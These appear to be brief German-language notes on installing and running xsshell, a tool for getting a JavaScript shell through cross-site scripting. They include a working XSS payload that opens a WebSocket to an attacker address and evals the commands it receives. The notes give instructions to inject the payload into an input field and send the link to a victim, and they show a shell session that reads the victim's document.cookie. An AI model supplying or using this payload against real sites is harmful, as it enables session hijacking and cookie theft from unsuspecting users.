git clone

• sudo apt-get install go
• go get github.com/raz-varren/xsshell
• go install github.com/raz-varren/xsshell

start

• ./xsshell -host 127.0.0.1 -port 4444

xsshell -h Usage of xsshell:

 -cert string
   	ssl cert file
 -host string
   	websocket listen address
 -key string
   	ssl key file
 -log string
   	specify a log file to log all console communication
 -path string
   	websocket connection path (default "/s")
 -port string
   	websocket listen port (default "8234")
 -servdir string
   	specify a directory to serve files from. a file server will not be started if no directory is specified
 -servpath string
   	specify the base url path that you want to serve files from (default "/static/")
 -wrkdir string
   working directory that will be used as the relative root path for any commands requiring user provided file paths

Payload

• Payload muss ins Eingabefeld
• Generierter Link wird zum Opfer geschickt

JS Script : <script>(function(){function e(a,b){return function(){return eval(a)}.call(b)}var d=new WebSocket("ws://10.82.70.52:4444/s"),f=function(a){this.send=function(b,c){d.send((c?"z":"")+a+b)}};d.onmessage=function(a){a=a.data;var b=new f(a.slice(0,8));try{e(a.slice(8),b)}catch(c){b.send(c,!0)}}})();</script>

Die Shell

Listening on [any] 5555 for incoming JS shell ...
Got JS shell from [10.85.70.1] port 53146 to orville 5555
>>> var test = 'hacked by xinux'
>>> confirm(test)
>>> prompt(document.cookie)

Auf dem Client

Links

• https://github.com/shelld3v/JSshell/blob/master/README.md